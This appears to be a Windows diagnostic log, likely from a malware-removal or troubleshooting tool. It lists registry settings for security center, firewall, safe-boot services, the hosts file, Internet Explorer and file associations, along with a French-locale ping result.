"LowPowerActive"=#USR:Control Panel\Desktop   
"LowPowerTimeOut"=#USR:Control Panel\Desktop   
"PowerOffActive"=#USR:Control Panel\Desktop   
"PowerOffTimeOut"=#USR:Control Panel\Desktop   
"ScreenSaveActive"=#USR:Control Panel\Desktop   
"ScreenSaveTimeOut"=#USR:Control Panel\Desktop   
"SnapToDefaultButton"=#USR:Control Panel\Mouse   
"TRANSMISSIONRETRYTIMEOUT"=#SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"DEFAULTSEPARATEVDM"=\\REGISTRY\\MACHINE\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\WOW   
"APPINIT_DLLS"=SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"DEVICENOTSELECTEDTIMEOUT"=#SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"SWAPDISK"=SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   

[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\IniFileMapping\system.ini\Boot]
""=SYS:Microsoft\Windows NT\CurrentVersion\WOW\boot   
"ScreenSaverActive"=USR:Control Panel\Desktop   
"ScreenSaverIsSecure"=USR:Control Panel\Desktop   
"SCRNSAVE.EXE"=USR:Control Panel\Desktop   
"Shell"=SYS:Microsoft\Windows NT\CurrentVersion\Winlogon   

[HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems]
"windows"=%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16

---------- | Security center

[HKLM\SOFTWARE\Microsoft\Security Center]
"cval"=1

[HKLM\SOFTWARE\Microsoft\Security Center\svc]
"VistaSp1"=128920218544262440
"AntiVirusOverride"=0
"AntiSpywareOverride"=0
"FirewallOverride"=0

[HKLM\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=0
"DisableRoutinelyTakingAction"=1
"ProductStatus"=0
"InstallTime"=0x04E7A1E978FACF01

[HKLM\Software\WOW6432Node\Microsoft\Windows Defender]
"DisableAntiSpyware"=0
"DisableRoutinelyTakingAction"=1

[HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall"=1

[HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=1

[HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall"=1


---------- | Safeboot

[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppInfo]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EFS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EventLog]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\File system]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Filter]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\KeyIso]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\NTDS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PNP Filter]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Power]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Primary disk]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ProfSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\RpcEptMapper]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\RpcSs]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sacsvr]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SCSI Class]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SWPRV]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\System Bus Extender]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TabletInputService]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TBS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TrustedInstaller]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\VDS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vmms]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\volmgr.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\volmgrx.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WinMgmt]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfPf]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfRd]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{533C5B84-EC70-11D2-9505-00C04F79DEAF}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{D48179BE-EC20-11D1-B6B8-00C04FA372A7}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppInfo]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BFE]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\bowser]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dfsc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dot3Svc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Eaphost]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EFS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\IKEEXT]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\KeyIso]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MPSDrv]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MPSSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mrxsmb]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mrxsmb10]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mrxsmb20]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NativeWifiP]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ndiscap]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\netprofm]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NlaSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Nsi]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\nsiproxy.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NTDS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PolicyAgent]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Power]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ProfSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdbss]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpencdd.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcEptMapper]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sacsvr]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCardSvr]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SWPRV]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TabletInputService]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TBS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TrustedInstaller]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VaultSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\VDS]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vmms]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\volmgr.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\volmgrx.sys]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinDefend]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wlansvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WudfPf]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WudfRd]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WudfSvc]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WudfUsbccidDriver]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{50DD5230-BA8A-11D1-BF5D-0000F805F530}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{533C5B84-EC70-11D2-9505-00C04F79DEAF}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{6BDD1FC1-810F-11D0-BEC7-08002BE2092F}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{D48179BE-EC20-11D1-B6B8-00C04FA372A7}]
[HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{D94EE5D8-D189-4994-83D2-F68D7D41B0E6}]

---------- | Winsock (Whitelist)


---------- | Hosts

# 
# 
# 
# 
# 
 
127.0.0.1       localhost 
::1             localhost 

---------- | Ping

Envoi d'une requ?te 'ping' sur google.com [216.58.205.174] avec 32 octets de donn?es?:
R?ponse de 216.58.205.174?: octets=32 temps=105 ms TTL=44
R?ponse de 216.58.205.174?: octets=32 temps=163 ms TTL=44
R?ponse de 216.58.205.174?: octets=32 temps=196 ms TTL=44
R?ponse de 216.58.205.174?: octets=32 temps=153 ms TTL=44

Statistiques Ping pour 216.58.205.174:
    Paquets?: envoy?s = 4, re?us = 4, perdus = 0 (perte 0%),
Dur?e approximative des boucles en millisecondes :
    Minimum = 105ms, Maximum = 196ms, Moyenne = 154ms

---------- | @

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger"=yes
"Anchor Underline"=yes
"Cache_Update_Frequency"=Once_Per_Session
"Display Inline Images"=yes
"Do404Search"=0x01000000
"Local Page"=C:\Windows\system32\blank.htm
"Save_Session_History_On_Exit"=no
"Show_FullURL"=no
"Show_StatusBar"=yes
"Show_ToolBar"=yes
"Show_URLinStatusBar"=yes
"Show_URLToolBar"=yes
"Use_DlgBox_Colors"=yes
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"XMLHTTP"=1
"NoUpdateCheck"=1
"UseClearType"=no
"Enable Browser Extensions"=yes
"Play_Background_Sounds"=yes
"Play_Animations"=yes
"Start Page"=http://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131294119787724027&GUID=46494860-EB64-434B-81CD-26292046AD04
"CompatibilityFlags"=0
"FullScreen"=no
"Window_Placement"=0x2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF270000002700000047030000A7020000
"IE8RunOnceLastShown"=1
"IE8RunOnceLastShown_TIMESTAMP"=0x41C79CBC3AF0D101
"IE8TourShown"=1
"IE8TourShownTime"=0xCF8888A6264ED001
"Default_Page_URL"=http://go.microsoft.com/fwlink/?LinkId=69157
"Check_Associations"=yes
"Default_Search_URL"=http://go.microsoft.com/fwlink/?LinkId=54896

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Internet settings]
"IE5_UA_Backup_Flag"=5.0
"User Agent"=Mozilla/4.0 (compatible; MSIE 8.0; Win32)
"EmailName"=User@
"PrivDiscUiShown"=1
"EnableHttp1_1"=1
"WarnOnIntranet"=1
"MimeExclusionListForCache"=multipart/mixed multipart/x-mixed-replace multipart/x-byteranges 
"AutoConfigProxy"=wininet.dll
"UseSchannelDirectly"=0x01000000
"WarnOnPost"=0x01000000
"UrlEncoding"=0
"SecureProtocols"=160
"PrivacyAdvanced"=0
"ZonesSecurityUpgrade"=0x829B3EF57AFACF01
"DisableCachingOfSSLPages"=0
"WarnonZoneCrossing"=0
"CertificateRevocation"=1
"EnableNegotiate"=1
"MigrateProxy"=1
"ProxyEnable"=0
"GlobalUserOffline"=0
"ProxyHttp1.1"=1
"ProxyOverride"=*.local
"WarNonBadCertReceving"=1
"WarNonHTTPSToHTTPRedirect"=1

[HKLM\Software\Microsoft\Internet Explorer\Main]
"AutoHide"=yes
"Security Risk Page"=about:SecurityRisk
"Extensions Off Page"=about:NoAdd-ons
"Default_Search_URL"=http://go.microsoft.com/fwlink/?LinkId=54896
"Default_Page_URL"=http://go.microsoft.com/fwlink/?LinkId=69157
"Anchor_Visitation_Horizon"=0x01000000
"Cache_Percent_of_Disk"=0x0A000000
"Placeholder_Width"=0x1A000000
"Placeholder_Height"=0x1A000000
"Default_Secondary_Page_URL"=
"Use_Async_DNS"=yes
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157
"Local Page"=C:\Windows\System32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Delete_Temp_Files_On_Exit"=yes
"Enable_Disk_Cache"=yes

[HKLM\Software\Microsoft\Internet Explorer\AboutURLs]
"blank"=res://mshtml.dll/blank.htm
"NoAdd-onsInfo"=res://ieframe.dll/noaddoninfo.htm
"InPrivate"=res://ieframe.dll/inprivate.htm
"NavigationFailure"=res://ieframe.dll/navcancl.htm
"NoAdd-ons"=res://ieframe.dll/noaddon.htm
"Home"=270
"PostNotCached"=res://ieframe.dll/repost.htm
"DesktopItemNavigationFailure"=res://ieframe.dll/navcancl.htm
"NavigationCanceled"=res://ieframe.dll/navcancl.htm
"Tabs"=https://www.google.com/
"OfflineInformation"=res://ieframe.dll/offcancl.htm
"SecurityRisk"=res://ieframe.dll/securityatrisk.htm

[HKLM\Software\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
""=http://

[HKLM\Software\Microsoft\Windows\CurrentVersion\URL\Prefixes]
"mosaic"=http://
"www"=http://
"home"=http://
"ftp"=ftp://
"gopher"=gopher://

[HKLM\Software\Microsoft\Windows\CurrentVersion\Internet settings]
"EnablePunycode"=1
"CodeBaseSearchPath"=CODEBASE
"WarnOnIntranet"=1
"MinorVersion"=0
"ActiveXCache"=C:\Windows\Downloaded Program Files

[HKLM\Software\WOW6432Node\Microsoft\Internet Explorer\Main]
"AutoHide"=yes
"Security Risk Page"=about:SecurityRisk
"Extensions Off Page"=about:NoAdd-ons
"Default_Search_URL"=http://go.microsoft.com/fwlink/?LinkId=54896
"Default_Page_URL"=http://go.microsoft.com/fwlink/?LinkId=69157
"Anchor_Visitation_Horizon"=0x01000000
"Cache_Percent_of_Disk"=0x0A000000
"Placeholder_Width"=0x1A000000
"Placeholder_Height"=0x1A000000
"Default_Secondary_Page_URL"=
"Use_Async_DNS"=yes
"Start Page"=http://go.microsoft.com/fwlink/?LinkId=69157
"Local Page"=C:\Windows\System32\blank.htm
"Search Page"=http://go.microsoft.com/fwlink/?LinkId=54896
"Delete_Temp_Files_On_Exit"=yes
"Enable_Disk_Cache"=yes

[HKLM\Software\WOW6432Node\Microsoft\Internet Explorer\AboutURLs]
"blank"=res://mshtml.dll/blank.htm
"NoAdd-onsInfo"=res://ieframe.dll/noaddoninfo.htm
"InPrivate"=res://ieframe.dll/inprivate.htm
"NavigationFailure"=res://ieframe.dll/navcancl.htm
"NoAdd-ons"=res://ieframe.dll/noaddon.htm
"Home"=270
"PostNotCached"=res://ieframe.dll/repost.htm
"DesktopItemNavigationFailure"=res://ieframe.dll/navcancl.htm
"NavigationCanceled"=res://ieframe.dll/navcancl.htm
"Tabs"=https://www.google.com/
"OfflineInformation"=res://ieframe.dll/offcancl.htm
"SecurityRisk"=res://ieframe.dll/securityatrisk.htm

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix]
""=http://

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\URL\Prefixes]
"mosaic"=http://
"www"=http://
"home"=http://
"ftp"=ftp://

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet settings]
"EnablePunycode"=1
"CodeBaseSearchPath"=CODEBASE
"WarnOnIntranet"=1
"MinorVersion"=0
"ActiveXCache"=C:\Windows\Downloaded Program Files


---------- | Proxy


[HKLM\System\CurrentControlSet\Services\NLASVC\Parameters\Internet\Manualproxies]

---------- | reparsepoint


---------- | Detection of offsets


---------- | Notify 


---------- | Execution FileExts


[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.awb]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.EVR]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.EVRC]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ivr]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ra]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ram]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rax]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rm]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmj]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmm]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmp]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rms]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmvb]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmx]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rsml]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rv]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rvx]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.smi]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.smil]
"Application"=
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ssm]
"Application"=







---------- | SIOI | SEH | URLSH

